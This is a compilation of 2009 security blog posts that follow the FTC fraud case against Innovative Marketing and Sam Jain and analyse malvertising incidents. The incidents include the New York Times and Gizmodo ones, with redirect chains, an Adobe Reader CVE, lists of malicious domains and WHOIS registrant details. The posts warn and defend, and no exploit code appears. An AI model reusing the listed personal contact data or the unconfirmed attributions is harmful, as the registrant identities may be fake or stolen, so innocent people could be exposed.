Spyware Sucks

FTC versus Innovative Marketing et al - developments

As we know, Jain's legal counsel have applied for leave to withdraw as his attorneys of record.  They have not been given permission to withdraw yet, and the deadline for Jain to respond to the FTC's renewed motion for sanctions was nigh, therefore Jain's counsel has filed a document in opposition to the renewed motion.

Jain's counsel claims that:

"Mr. Jain is not acting in bad faith, but on a well-justified fear that the FTC will attempt to circumvent and undermine his valid Fifth Amendment privilege against self-incrimination".

and

"Regarding deterrence, Mr. Jain is not guilty of a pattern of contumacious behavior; indeed, through counsel, he otherwise has actively participated in this case for almost one year."

and

"Finally, the FTC does not even address the possibility of lesser sanctions against Mr. Jain."

My immediate reaction, on reading the motion, was “come on, who are they trying to fool?”. Let's not forget, when reading the above, that Jain's legal counsel claim in their motion for leave to withdraw that they have NEVER had direct contact with Jain, and that they have had no indirect contact with him for more than 10 months, and that they have no idea where he is.  Such silence does not equate to 'active' participation in my world.

Not surprisingly, the FTC's response has been swift and states, in part:

"Counsel’s description of Jain’s conduct bears no resemblance to the facts of this case. Jain – a fugitive for nearly a year now – has been toying with this Court and the FTC from the outset of this case. Jain has ignored the Temporary Restraining Order and Preliminary Injunction entered by this Court, and completely disregarded this Court’s most recent command that he appear for deposition."

and

"Jain has also wasted this Court’s time with a barrage of frivolous motions, which were designed solely to bog down this litigation and delay the FTC’s efforts to obtain redress on behalf of the millions of consumers Jain and his co-defendants have defrauded. Having succeeded in delaying this case for as long as possible, Jain has now disappeared, and left his lawyers behind to craft excuses for his egregious conduct."

It makes you wonder whether Jain's lawyers have received, or are going to receive, payment for their hard work over the past year, doesn't it.  Here's hoping they received plenty of $$ in advance.

FTC versus Innovative Marketing et al - Sam Jain's legal counsel request leave to withdraw as attorneys of record

In a not unsurprising development, legal counsel for Sam Jain have petitioned the Court for permission to withdraw as attorneys for Sam Jain.  The FTC does not oppose the request, but does object to any further extension of Mr Jain's time to respond to the FTC's pending Renewed Motion for Rule 37 Sanctions.

The reasons Jain's attorneys ask for permission to withdraw are:

1. They have NEVER communicated directly with Jain.
2. Their last indirect communication with Jain was received on January 14, 2009.
3. They have not communicated with Jain in more than 10 months, since before the bench warrant was issued for Jain's arrest by the US District Court for the Northern District of California in an unrelated.
4. They claim to have no knowledge of Jain's whereabouts, and to have no ability to contact him directly.

Jain's legal counsel state that "considering the bench warrant in the Northern District of California and the ongoing criminal investigation in the Northern District of Illinois, there is no indication Mr Jain will participate meaningfully in discovery, with or without counsel."

FTC versus Innovative Marketing et al - developments

Innovative Marketing and Daniel Sundin are still unrepresented.

09/16/2009
ORDER denying Motion of Marc D'Souza to Dismiss the Complaint. DIRECTING D'Souza to answer the complaint within 20 days. Signed by Judge Richard D Bennett on 9/16/09.

"Viewing the totality of the allegations through the lens of judicial experience and common sense, this Court finds that the FTC has clearly “plea{d} factual content that allows the court to draw the reasonable inference that the defendant is liable for the misconduct alleged.” Iqbal, 129 S. Ct. at 1949 (citing Twombly, 550 U.S. at 50). Through its extensive factual pleadings, the FTC has positioned its claims against Marc D’Souza safely within the realm of plausibility."

10/02/2009
MEMORANDUM ORDER granting Motion for Sanctions against Sam Jain insofar as certain conditions are imposed.

“The FTC’s Motion for Rule 37 Sanctions against Defendant Sam Jain (Paper No. 131) is GRANTED insofar as the following conditions are hereby imposed:

“1. the FTC is instructed to re-notice Jain’s deposition for an agreed upon time within the next thirty days of the date hereof;
2. Jain shall again be offered the opportunity to be deposed by video-conference from a location of his choosing;
3. Jain is hereby warned that if he fails to attend this upcoming deposition, this Court will consider imposing a default judgment against him pursuant to Federal Rule of Civil Procedure 37(d).”

10/06/2009
ANSWER to FTC Complaint (document 1), by Marc D'Souza

A few minor admissions, lots of denials, a claim that "the FTC has authority to seek restitution, consumer redress or disgorgement with respect to conduct that took place outside the United States and that does not affect domestic commerce", lot of declining to answer under the Fifth Amendment (while at the same time requesting that said refusal be treated as a denial).

10/22/2009
Second MOTION for Sanctions Pursuant to Rule 37 Against Sam Jain by Federal Trade Commission. Responses due by 11/9/2009

"Sam Jain has made a mockery of this proceeding and has demonstrated nothing but contempt for this Court and the American judicial system as a whole. Together with his codefendants, Jain perpetrated one of the largest online frauds ever prosecuted by the FTC, with a total consumer injury figure that – as the Court will soon hear – exceeds $150 million. After being caught red-handed by the FTC, Jain promptly fled the United States, leaving his lawyers behind to delay the FTC’s efforts to redress the massive consumer injury Jain helped inflict. After nearly a year of delay, Jain has reached the end of the road. Unwilling to comply with this Court’s command that he participate in discovery, Jain has no further ability to stall this litigation. As a result, Jain has washed his hands of this matter, and simply disappeared. Given these facts, it is difficult to imagine a case that better supports the imposition of terminating sanctions, or an individual more deserving of such an outcome than Jain."

11/02/2009
MOTION for Extension of Time to File Response/Reply as to Second MOTION for Sanctions Pursuant to Rule 37 Against Sam Jain by Sam Jain. Responses due by 11/19/2009 (unopposed)

"Mr. Jain respectfully submits that good cause for granting this Motion exists: (1) Mr. Jain has not requested or received from the Court an extension on any other response or reply filed in this case; (2) Logistical obstacles and the important factual and legal issues raised by the FTC’s Renewed Motion necessitate a brief extension of time to respond."

11/03/2009
Paperless ORDER granting Defendant Jain's unopposed Motion for Extension of Time. Response to Second Motion for Sanctions due 11/16/2009

Ponderings about the incident that hit Gizmodo (courtesy of Gawker)

While I was on holidays, a malvertizing incident hit Gizmodo (via advertising sold to Gawker).  The miscreants impersonated the legitimate advertising agency Spark Communications, registering the domain spark-smg.com (the real domain is sparksmg.com) to assist in the impersonation.

Publicis have since taken over the fraudulent domain spark-smg.com but we still have access to historical information about the domain which is interesting.

Before we get into the nitty gritty of the domain itself, I have a few observations to make.  In short, the tricks used were not new.

"Gawker Sales Guy" says on the businessinsider.com web site that"

"The reason this is news (and the reason we sent it here in the first place) is because these guys were so thorough they managed to fool multiple levels of safeguards we have in place to keep this thing from happening. There was literally NO way for us to know, short of calling the agency and doing background checks on everyone we work with."

Why did nobody notice that the domain spark-smg.com being was used, instead of sparksmg.com.  I concede that the difference between the domains is subtle, but even if  the "Gawker Sales Guy" who was corresponding with the miscreants did not notice the subtle difference in domains at first, I would have expected him to take a closer look when one of his emails bounced on Saturday 28 September.

The realities of malvertizing *are* well known in the industry nowadays, thanks to all of the publicity that it has received over the past year or so.  Many warnings have been sent out by various parties and there have been many high profile incidents.  The new person approaching Gawker, the bounced email, and the wide variation in time of day when emails were received should have all given the Gawker Sales Guy reason to pause and take a closer look (despite the fraudster claiming, in one email, to be in London).  "Background checks" should be standard operating procedure, and "calling the agency" using their main telephone number (not a direct line) should also be standard operating procedure, even after background checks have been completed, whenever a new name appears.

Gawker Sales Guy (http://www.businessinsider.com/henry-blodget-gawker-scammed-by-malware-pretending-to-be-suzuki-2009-10#comment-4ae6561900000000008b1b70) then goes on to say:

"This was truly damn near impossible to spot as a fake."

This claim is impossible to judge without specific technical information.  That being said, the ads have to touch something bad as part of the malvertizement process, even if the malicious behaviour itself does not trigger.

On the BBC web site (http://news.bbc.co.uk/2/hi/technology/8328399.stm) it states:

"Blaming the fact that staff used Linux operating systems on their production machines for "not noticing sooner", it advised concerned users to load some up-to-date antivirus software and "make sure your system is clean"."

The fact that staff use Linux on their production machines is not why the staff did not see the malvertizements.  As regular readers of this blog know, the miscreants behind malvertizing actively manage their campaigns, deliberately doing all they can to avoid detection by victim web sites via geo-targeting, IP exclusions and whatnot.  I would be *extremely* surprised if the malicious behaviour would have been triggered if the malvertizement was displayed on a computer within an IP range associated with the victim web site, or the infrastructure used to serve the advertisement, even if it were running an old, vulnerable, version of Windows.  The bad guys are not fools – they are not going to allow malicious behaviour to trigger on a computer known to be owned by the very people they are trying to fool and defraud.

Online Media Daily (http://www.mediapost.com/publications/?fa=Articles.showArticle&art_aid=116269) states that it "is believed to be the first to successfully mimic the identity of a major advertising agency".

Ok, I suppose we can argue about what a "major" advertising agency is, but it certainly is not the first time an advertising agency has been spoofed (or the first time that the bad guys have made preparations to do just that).  Some malicious domains that I have seen, and reported on in the past, that could be used to spoof legitimate ad networks include:

byronadvertising.eu (used to impersonate the legitimate byronadvertising.com and byronadvertising.co.uk)
koeppelinteractive.co.uk (impersonating koeppelinteractive.com, redirecting visitors to that domain)
quigley-simpson.net (impersonating quigleysimpson.com, redirecting visitors to that domain)
mediavest-corp.com (WHOIS referred to support@us-resources.com, an email address also used with the legitimate mediavest.net)
posnerpromotion.com (impersonating posneradv.com, redirecting visitors to that domain)
adconion-inc.com (impersonating adconion.com, redirecting visitors to that domain)
carat-inc.com (impersonating carat.com, redirecting visitors to that domain)
pubmatic-inc.com (impersonating pubmatic.com, redirecting visitors to that domain)
doubleclick-ssl.com (impersonating Doubleclick)

Then there are the fake sites pretending to sell advertising directly on behalf of large corporations:

Tribalfusion has even been impersonated in a credit reference.

Anyway, let's take a look at spark-smg.com and see what danger signs we can find by examining historical data (taken from before Publicis Groupe S.A. took over the domain). 

spark-smg.com
ICANN Registrar: BIZCN.COM (a known problem Registrar)
Created 4 September 2009 (a very new domain, another bad sign)

IP address (up until on or about 3 October 2009): 212.117.175.6

212.117.175.6 = Luxembourg Root Esolutions (another problematic host, too often seen in association with malvertizing).

Note:  A check of the IP range 212.117.175.% reveals a few domains associated with advertising that should be treated with caution:

RevolteChMedia.com (claims to have been around since 2004, but the domain was only registered on 13 October 2009 - ICANN Registrar BIZCN.COM, INC))

BellWayInteractive.com (registered on 14 September 2009 - ICANN Registrar BIZCN.COM, INC)

SmartMediaWay.com (registered 14 September 2009 - ICANN Registrar BIZCN.COM, INC)

GoldBayMedia.com (registered 14 September 2009 - ICANN Registrar BIZCN.COM, INC)

Six countries, and 3 weeks, later I am back from holidays

After exploring the northern hemisphere of our amazing planet and visiting climates as varied as 41 degrees (Celsius) in Egypt and –2 degrees (Celsius) in an ice grotto situated at 3,000 feet above sea level in Switzerland, and flying over the Ukraine at roughly 11,000 feet (yes, malvertizing did cross my mind when I saw where the plane was situated) I am back on duty and ready to resume keeping all of you informed about the latest happenings in the malvertizing world.

My apologies for not letting my loyal readers know that I would be absent; for obvious reasons I prefer NOT to advertise publicly that I will be away for an extended period until after I return.

If anybody is interested in photos, I took 600 (and some of them are even pretty good) … :-)

And the winner is…

Better… much better…

Poll results

Would you like to help choose the new Vegemite name?

Kraft have bowed to public pressure, and have scrapped the (dare I say loathed) Vegemite name “iSnack 2.0”.

And, they have decided that the public will choose the new name, by voting on it.

Here is the URL if you’re so inclined:
http://www.ys2.net.au/surveys/9/y90926.asp

There are six names to choose from, and sadly you will have to rate them from your first choice, to your last choice.  The choices are:

Vegemite Cheesybite, Vegemite Vegemate, Vegemite Snackmate, Vegemite Smooth, Vegemite Vegemild and Vegemite Creamymate

Polling starts at 5pm (AEST) on Friday 2 October 2009 and ends at 12 noon (AEDST) on Monday 5 October 2009.

I have received the Microsoft MVP Award – for the 11th time

I received an email today advising me that I have been awarded Microsoft MVP status for the 11th time.

Unlike my previous 10 awards, this time I have been awarded Microsoft MVP under the specialty “Consumer Security: Training” instead of as an Internet Explorer MVP.  I think that is perfectly appropriate; for years I have focused on Consumer Security from the perspective of an Internet Explorer user, but in recent years my focus has moved to studying malvertizing – what it is, how it works, and who is behind it – and, most importantly, sharing and passing on that knowledge and advising advertising networks and web site owners on how to best avoid the miscreants behind malicious advertising.

Avoiding the bad guys is NOT easy, and is getting harder all the time.  As the Internet Community as a whole has become more aware, and as people as myself have put so much time and effort into educating the community, the bad guys have had to match our efforts and become sneakier.  The impersonation of legitimate companies has become more common; malicious SWF advertisements seem to be falling out of favor as we get better at detecting them, and the bad guys no longer dump all of their eggs in the one basket.

The most important thing that any of us can do is complete comprehensive reputational research and background checks into any new advertiser/partner/client.  And, don’t take what is on those credit reference forms at face value.  Double check that the phone number supplied for the credit reference matches the company that he or she claims to work for.  If approached by a well known company, make sure that the domain being used actually belongs to that company.

If you are approached by a well known company, put the attraction of money aside and ask yourself why they would want to advertise with you, and be honest with yourself in your answers.  Do you attract enough traffic to make it worth their while? Are you well known enough? Is your target audience appropriate to what they are selling?  Is there a sense of urgency to the sale? Are they contacting you at unusual times of the day or night?  Are they reluctant to speak by telephone?  Does an answering machine pick up too often?

A good reputation is hard won, and easily lost, and the negative press caused by a malvertizing incident does not go away.  Your web site may be blocked by the various web reputation services that are available nowadays.  Google may block access to your site via web searches.  Eventually there may be a noticeable reduction in advertising income if your visitors take it upon themselves to block all advertising for their own protection, or they may become angry or frustrated and stop visiting at all, especially if there is more than one malvertizing incident.

Finally – train your staff. Make www.anti-malvertising.com required reading and DO WHAT IS SUGGESTED.  If, despite your best efforts, you receive reports of problems from your visitors, DO NOT assume that your visitor is blaming you unfairly, or that there may be a problem with their computer.  Take *all* reports seriously, and ASK FOR HELP.  It is unlikely that your visitors will be sophisticated enough to be able to gather the evidence you need on their own, and the bad guys are very good at hiding their activities from you using various tricks.

And keep reading this blog :)

Waiting for an Apple lawsuit….

… or maybe a lawsuit by the makers of “iSnack Cyber Chips” or the “iSnack Energy Bar”.

Yes, Kraft really did choose to name their new Vegemite “iSnack 2.0”.  The name was “invented” (and I use that term very loosely) by Dean Robbins, a 27 year old West Australian and graphic and web designer.

What were Kraft thinking…

So far, the responses I am seeing are overwhelmingly negative, and you can add me to the list of critics.

ALERT: Please treat content from extrabanner.com with extreme caution

Regular readers will recognize the domains t.banner09092.com and blackwater-cuprumworks.net – they were the domains used to attempt infection of computers via various security exploits:
http://msmvps.com/blogs/spywaresucks/archive/2009/09/12/1722754.aspx

Luckily, the domain blackwater-cuprumworks.net is not responding at the moment.

extrabanner.com
ICANN Registrar: Godaddy.com, Inc
Created 30 July 2009
NS47.DOMAINCONTROL.COM
NS48.DOMAINCONTROL.COM

IP: 68.178.232.100 - Arizona, Scottsdale, Godaddy.com, Inc (shares IP with 11,081,675 other sites)

Registar:
Domain Owner (trafficbuyer@gmail.com - the same as pussbanner769.info)
15156 SW 5th
Scottsdale, Arizona 85260
US

*****

dullnessfrequenting.info
ICANN Registrar: Godaddy.com, Inc
Created 17 September 2009
NS57.DOMAINCONTROL.COM
NS58.DOMAINCONTROL.COM

IP: 68.178.232.100 - same as extrabanner.com

Registrant:
Domain Owner (trafficbuyer@gmail.com)
15156 SW 5th
Scottsdale, Arizona 85260
US

*****

t.banner09092.com
ICANN Registrar: Godaddy.com, Inc
Created 18 September 2009
NS57.DOMAINCONTROL.COM
NS58.DOMAINCONTROL.COM

IP: 68.178.232.100 (again)

Registrant:
Domain Owner (trafficbuyer@gmail.com)
15156 SW 5th
Scottsdale, Arizona 85260
US

*****

blackwater-cuprumworks.net
ICANN Registrar: DIRECTI (Registration service "Domain Names Registrar Reg.Ru Ltd")
Created 7 September 2009
NS1.EVERYDNS.NET
NS2.EVERYDNS.NET

IP: 213.155.2.112 - Namibia, Grinvich3, Vladimir Gubarenko

Shares IP with the domains amateursex-hert.com, aw-work.net, awirons-work.com, blackwater-ironworks.com, blackwater-ironworks.net, blackwater-metalworks.net, blackwater-metalworks.net, sexamateur-hartcore.com and sleazy-dreamers.net

Registrant:
Eduard Skobelev (eddiscobbi3@gmail.com)
ul. Starinskaya, d.1, kv. 92
g. Moskva
g. Moskva, 107009
RU
Tel: +7 4952243948

Added to the “the Victorian Police are looking for WHAT???” file

“SOS issued for original ABBA jumpsuit

VICTORIA Police have issued an SOS to help find a white jumpsuit originally worn by ABBA songstress Agnetha Faltskog.

The jumpsuit, which Agnetha is pictured wearing on the cover of the Swedish pop group's fourth album, Arrival, is believed to have been taken from a Melbourne house and sold at a garage sale.

The jumpsuit's owner had leased out the Healesville home with the 1970s jumpsuit still stored in the shed.

Police believe the figure-hugging suit may have been sold by the tenants in a garage sale.

The tenants will be interviewed by police, a Victoria Police spokeswoman said.

Police would like to speak to anyone who may have attended a garage sale at the Don Road property in May this year.”

Source: http://www.news.com.au/story/0,27574,26087496-29277,00.html

(Yes, I know, the graphic I have used is not from the actual “Arrival” album’s front cover, but it does show the jumpsuit properly) ;o)

Ponderings about the New York Times malvertizing incident

It has been all over the popular press – the New York Times web site had been tricked into accepting a malvertizement that was hijacking some visitors to that site and dumping them at a web site touting fake security software.  And, in a move that is kind of unusual, the New York Times web site displayed a warning about the malvertizement.

It just so happens that over on yort.com (author: Troy Davis) there is a screenshot demonstrating how the hijack was triggered:

New York Times incident as reported on yort.com	Similar incident as reported on Spyware Sucks

As you can see from the screenshots above, the two incidents are very similar, and the important stuff – the stuff that caused the hijack – is the code starting at “var a1” in both screenshots.  Depending on various conditions and controls (geolocation, IP address, time of day etc) some visitors would have received JUST the advertisement – others would have seen **the same advertisement** but would have also received the extra code (as pointed out above, starting at var a1).

The IP address of the hijacking domain, tradenton.com, is:

• at a known bad IP (as reported on this blog on the 10th of September)
• other bad domains were discovered in the same IP range as far back as 4 September
• was very new (registered just this month)
• was registered using a known problematic Registrar

I have said many times on this blog and elsewhere that reputational checks are of CRITICAL IMPORTANCE when accepting advertisements.  Information was available to warn those alert to potential danger that caution was needed as far back as the 4th of September (cite: my alert about vonage-inc.com on 4 September 2009).

Please… take advantage of services such as http://www.anti-malvertising.com/ and start conducting indepth research when somebody tries to sell you advertising.  One day, your web site may not be hit by an advertisement that simply redirects your visitors to a fake security website.  Instead, your visitors may be redirected to:

• a p0rn0graphic web site, complete with streaming video and sound on the opening page:
  http://msmvps.com/blogs/spywaresucks/archive/2007/12/31/1428144.aspx
  
• a web site that tries to infect your visitor’s computers using various security exploits:
  
  http://msmvps.com/blogs/spywaresucks/archive/2009/09/12/1722754.aspx
  http://msmvps.com/blogs/spywaresucks/archive/2009/07/22/1704910.aspx

The New York Times hijack in progress, as captured and reported by yort.com… 

I have been reading the report at wired.com about this incident, and think it is worthwhile pondering some of the points made in the article.

wired.com: “The move comes after a security loophole allowed scammers over the weekend to swap an innocuous advertisement for one serving a fake virus-warning, and hawking a deceptive scareware product intended to sell bogus security software.”

wired.com: ““Over the weekend, the ad being served up was switched so that an intrusive message, claiming to be a virus warning from the reader’s computer, appeared.”

wired.com are correct when they say that the incident occurred because of a “security loophole” (that is, the New York Times allowed content to be displayed on its web site that was hosted remotely by a domain outside of their direct command and control – an extremely common behavior and certainly not unusual to the New York Times). 

That being said, I find it interesting that an “innocuous advertisement” would be “swapped out” or “switched”.  Standard modus operandi for incidents such as the one caught by yort.com has always been to simply add additional malicious code when certain conditions were met – the advertisement itself has not changed in previous incidents (except for when there is an industry-standard rotation of advertisements, which is not the same as a deliberate swapping out). 

wired.com: “Readers who clicked on the ad found their browsers hijacked while a fake virus-scan was displayed. If they allowed the malicous (sic) website to serve its executable payload, they’d be stuck with a fake scareware program that badgers them into buying supposed anti-virus software.”

Wrong.  No user interaction is required for the hijack to occur.  Nobody needed to click on anything.

Also, as evidenced by the yort.com report, if a person was not hijacked (and therefore had the opportunity to click on the advertisement), then they were redirected to a legitimate website (in the yort.com example, the BVLGARI advertisement was linked to the URL http://www.bulgari.com/main.php?lang=6/ref=680).

bulgari.com
ICANN Registrar: GROUP NBT PLC AKA NETNAMES
Created 17 February 1998
AUTH200.NS.UU.NET
AUTH210.NS.UU.NET
NS.BULGARI.COM

Registrant:
Bulgari SpA
Lungotevere Marzio 11
Roma
00186
IT

wired.com: “The Times declined to identify the “national advertiser” the scammers originally impersonated.”

Again, let’s refer to yort.com.  From that article I can retrieve the URL of the advertisement used – you can see it to left of screen (I should warn you that there *may* have been more than one advertisement being supplied by the miscreants – we should not assume that this was the only advertisement that a victim may have seen).

The author also writes:

“A comment gave the campaign ID as Vonage01_1163613_nyt12, though it was obviously unrelated to Vonage.”

I wonder if the domain vonage-inc.com was used by whoever it was that sold the malvertizing to the New York Times.  vonage-inc.com used to have the IP address 212.117.166.71, and known to be used by cybercriminals to impersonate the real Vonage.  Thankfully, vonage-inc.com seem to have been handed over to the *real* Vonage on or about 5 September.

I wrote about vonage-inc.com back on 4 September 2009.

Edit: I see that the New York Times has admitted that Vonage was impersonated:

“The creator of the malicious ads posed as Vonage, the Internet telephone company, and persuaded NYTimes.com to run ads that initially appeared as real ads for Vonage. At some point, possibly late Friday, the campaign switched to displaying the virus warnings.

Because The Times thought the campaign came straight from Vonage, which has advertised on the site before, it allowed the advertiser to use an outside vendor that it had not vetted to actually deliver the ads, Ms. McNulty said. That allowed the switch to take place. “In the future, we will not allow any advertiser to use unfamiliar third-party vendors,” she said.”

Just to repeat what I said above, information was available on the net, warning that Vonage was being impersonated, as far back as 4 September.

So, what do we know about the domains implicated in this latest incident?

tradenton.com
ICANN Registrar: BIZCN.COM, INC
Created 2 September 2009
NS1.EVERYDNS.NET
NS2.EVERYDNS.NET

IP: 212.117.166.69 - Luxembourg, Root Esolutions (a known bad IP address – also, note how close the IP address is to what used to be the IP address for vonage-inc.com)

Currently shares IP with harlingens.com, kennedales.com, newadsresults.com, relunas.com and waveadvert.com

Registrant:
Tradenton
Shawn Brownell (shawn@tradenton.com)
978-214-3972 fax: 978-214-3972
3051 Pearlman Avenue
Wilmington MA 01887
US

*****

harlingens.com
ICANN Registrar: BIZCN.COM, INC
Created 2 September 2009
NS1.EVERYDNS.NET
NS2.EVERYDNS.NET

Registrant:
harlingens.com
Richard Andrew (admin@harlingens.com)
956-893-2463 fax: 956-893-2463
4859 Carolina Avenue
Harlingen TEX 78550

*****

sex-and-the-city.cn
ICANN Registrar: Chinese
Created 3 September 2009
NS1.EVERYDNS.NET
NS2.EVERYDNS.NET

IP: 94.102.48.209 - Noord-holland, Amsterdam, As29073 Ecatel Ltd

Registrant: oregon.artscomm@state.or.us

*****

Finally, yort.com mentions adxbigad - I have found several references to adxbigad in scripts designed to remove advertising from the New York Times web site (cite: http://userscripts.org/scripts/review/56684)

ALERT: Please treat content from trendbanner.com with extreme caution

It has been implicated in the facilitation of malvertizing that attempts to infect computers via PDF exploit

The way it works is as follows:

ad.trendbanner.com uses document.write to load the JS content at banner.pushbanner769.info

banner.pushbanner769.info displays an advertisement, but also loads content from content from t.banner08092.com.

t.banner08092.com simply redirects to blackwater-cuprumworks.net

blackwater-cuprumworks.net includes a javascript (valla.js) which loads content from bintus-bahi.cn in a 0x0 iframe

bintus-bahi.cn uses CVE-2009-0927 (Stack-based buffer overflow in Adobe Reader and Acrobat via the getIcon method of a Collab object) to infect vulnerable computers, as well as downloading other malware.

The SWF (oneComesEthics.swf) is suspected to be malicious.

Virustotal analysis of some content received via bintus-bahi.cn:

http://www.virustotal.com/analisis/fbf39bcd9dea6e1233895e391c2d4bab22096cf7b76b8a6b760203f3d0efa76d-1252662476

Domain information

ad.trendbanner.com
ICANN REGISTRAR: GODADDY.COM, INC
Created 30 July 2009
NS47.DOMAINCONTROL.COM
NS48.DOMAINCONTROL.COM

IP: 161.58.56.25 and 207.57.97.233

Shares IP with doityourselfbuilder.com and banner.islandbanner.com

Registrant:
Modena Inc (domains@modenainc.com) (associated with 102 domains)
921 SW Washington ST
Suite 228
Portland, Oregon 97205
United States

Modena Inc have a dubious history, with complaints as far back to 2005 about "spyware infested filesharing programs", site scraping and 302 domain poisoning:

http://www.freedomcrowsnest.org/forum/viewtopic.php?t=1416
http://forum.abestweb.com/showthread.php?p=456066&mode=threaded#post456066

Modena Inc domains were also part of the malvertizing incident that his digitalspy.co.uk:
http://msmvps.com/blogs/spywaresucks/archive/2009/07/22/1704910.aspx

There is also a dishonorable mention at bluetack.co.uk (**10** different security exploits were used in that incident) - domains used were banners.exitexchange.com and count.exit1208.com:
http://www.bluetack.co.uk/forums/index.php?showtopic=18064&st=210&p=90509&

It is interesting that ashoping.com was part of the incident recorded at bluetack.co.uk. The registrant, helen.nikolson@gmail.com, has been seen myriad times, in association with traffichunters.net (which we can tie to Innovative Marketing in the Ukraine):
http://msmvps.com/blogs/spywaresucks/archive/2009/03/27/1682054.aspx

*****

doityourselfbuilder.com
ICANN Registrar: MELBOURNE IT, LTD D/B/A INTERNET NAMES WORLDWIDE
Created 10 June 2006
NS1.SECURE.NET
NS2.SECURE.NET

Registrant:
Music Unlimited Inc
PO Box 1200
Jacksonville 97530

Admin Name:
David Sprunger (pptorders@playpianotoday.com)

*****

banner.islandbanner.com
ICANN Registrar: GODADDY.COM, INC
Created 24 July 2009
NS45.DOMAINCONTROL.COM
NS46.DOMAINCONTROL.COM

IP: 68.178.232.100 (shares IP with 11,039,738 other sites)

Registrant:
Modena Inc (domains@modenainc.com) (associated with 102 domains)
921 SW Washington Street
Suite 228
Portland, Oregon 97205

*****

pussbanner769.info
ICANN Registrar: GODADDY.COM, INC
Created 7 August 2009
NS47.DOMAINCONTROL.COM
NS48.DOMAINCONTROL.COM

IP: 68.178.232.100 (shares IP with 11,039,738 other sites)

Registrant:
Domain Owner (trafficbuyer@gmail.com)
15156 SW 5th
Scottsdale
Arizona 85260
Tel: +1 8005551212

*****

blackwater-cuprumworks.net
ICANN Registrar: DIRECTI
Created 7 September 2009
NS1.EVERYDNS.NET
NS2.EVERYDNS.NET

IP: 213.155.2.112 - Namibia, Grinvich3, Vladimir Gubarenko

Shares IP with the domains aw-work.net, awirons-work.com, sexamateur-hartcore.com and sleazy-dreamers.net

Registrant:
Eduard Skobelev (eddiscobbi3@gmail.com)
ul. Starinskaya, d.1, kv. 92
g. Moskva
g. Moskva, 107009
RU
Tel: +7 4952243948

*****

masterwood-works.com
ICANN Registrar: NETWORK SOLUTIONS, LLC.
Created 19 February 1999
NS.WVT.NET
NS2.WVT.NET

IP: 65.36.167.73 - Delaware, Newark, Hostmysite

Shares IP with 395 other sites

Registrant:
Master Wood-Works
4526 Olentangy River Road
Delaware, OH 43015
US

Admin:
Steve Krengel (hostmaster@wvt.net)

*****

bintus-bahi.cn
ICANN Registrar: Chinese
Created 15 August 2009
NS1.EVERYDNS.NET
NS2.EVERYDNS.NET
NS3.EVERYDNS.NET
NS4.EVERYDNS.NET

IP: 61.235.117.72 - Guangdong, Shenzen, China Railcom Guangdong Shenzhen Subbranch

Registrant:
Cehhost, inc (owns about 84 other domains)
Lucas Steven (steven_lucas_2000@yahoo.com)

Alert: please treat content from kennedales.com with extreme caution

I have received information that kennedales.com has been implicated in a malvertizing incident. 

I noted in my last blog post that kennedales.com shares IP address with two other domains that have already been caught facilitating malvertizing but at that time had not received intelligence indicating that kennedales.com was also involved.

Now we know that it is.

Another two bad domains: newadsresults.com and waveadvert.com

Seen distributing malvertizing at starnewsonline.com:
http://forums.starnewsonline.com/eve/forums/a/tpc/f/6431032365/m/7121097019/r/9841029019

And collegehumor.com:
http://www.facebook.co.za/CollegeHumor

And tigerdroppings.com:
http://www.tigerdroppings.com/rant/messagetopic.asp?p=14780012&pg=1

And basilmarket.com (page doesn't load, but you can find it in Google cache):
http://www.basilmarket.com/forum/1184277/2

newadsresults.com
ICANN Registrar: BIZCN.COM, INC.
Created 21 July 2009
NS1.EVERYDNS.NET
NS2.EVERYDNS.NET

IP: 212.117.166.69 (Luxembourg, Root Esolutions)

Shares IP with two other domains, kennedales.com and waveadvert.com

Registrant:
RJ
Rita Johnson (ritaj@gmail.com)
4122082301 fax: 4122082301
101 Bellevue Road
Pittsburgh PA 15229
US

*****

kennedales.com
ICANN Registrar: BIZCN.COM, INC
Created 14 August 2009
NS1.EVERYDNS.NET
NS2.EVERYDNS.NET

IP: 212.117.166.69 (Luxembourg, Root Esolutions)

Registrant:
kennedales.com
Jonathan Nelson (admin@kennedales.com)
812-750-2673 fax: 812-750-2673
1370 Heliport Loop
Bloomington IN 47404
US

*****

waveadvert.com
ICANN Registrar: BIZCN.COM, INC.
Created 4 August 2009
NS1.EVERYDNS.NET
NS2.EVERYDNS.NET

IP: 212.117.166.69 (Luxembourg, Root Esolutions)

Registrant:
Premier ANC
Linda Hogan (lindahg@yahoo.com)
6788081308 fax: 6788081308
4495 Atlanta Hwy
Atlanta GA 30052
US

Note waveadvert.com’s involvement in malvertizing incidents at blogspot.com:
http://google.com/safebrowsing/diagnostic?site=waveadvert.com/&hl=en-gb

And a problem at mangafox:
http://forums.mangafox.com/showthread.php?p=2507674

ALERT: The gogomediacenter.com incidents continue

I have a few more domains for you…

mediadison.com
ICANN Registrar: BIZCN.COM, INC
Created 6 July 2009

IP: 212.117.166.77, Luxembourg, Root Esolutions

Sharing IP with the following domains, all of which should be treated with extreme caution:

2ez4clicks.com, denrifiox.com, monsteradhost.com, newage-advertising.com, profitgainerz.com, ranparetc.com, s7atwola.com, scheuvronts.com, smartadvertisment.net, westernadrix.com

Registrant:
Solaris Co
Jack Thompson (jthompson@yahoo.com)
4049422100 fax: 4049422100
1921 Monroe Drive
Atlanta GA 30324

stopdrugstoday.cn
ICANN Registrar (Chinese)
Created 1 September 2009

IP: 83.133.126.155 - Germany, Lncde-greatnet-newmedia

Registrant administrative email: webmaster@tangodance.cn

By the way, we should revisit gogomediacenter.com - there have been some changes since I last posted with some new domains appearing at its IP address:

gogomediacenter.com
ICANN Registrar: BIZCN.COM, INC
Created 26 August 2008

IP: 212.117.166.75 - Luxembourg, Root Esolutions

Shares IP with the domains bestmediamind.com, fastdns-ms7.com, jetfastads.com, pro-drugstore.com, query2feed.com, tdshosterserv8.com and yakaboopromo.com (all domains should be treated with extreme caution).

Registrant:
Mediaswan
Frank Roberts (frank@mailqueen.com)
2128054649 fax: 2128054649
2130 Small Street
New York, NY 10007

What can I say … but…

Ouch.  I haven’t seen a mess this bad since IE7 first came out in beta… (yes, IE8’s Compatibility View fixes the display issues).

ALERT: Please treat the domains gogomediacenter.com, sys17media.com and praharesorts.cn with extreme caution

It is very interesting to watch the modus operandi that the bad guys are using change.

This malvertizement was NOT seen on a web page; rather it was being displayed by an advertising supported freeware application.

The trouble starts when an ad.yieldmanager.com GET retrieves content, in an iframe, from the domain "gogomediacenter.com".  The content served up by gogomediacenter.com is an innocent "skechers” JPG (which is the advertisement itself), but it also serves up a little something extra...

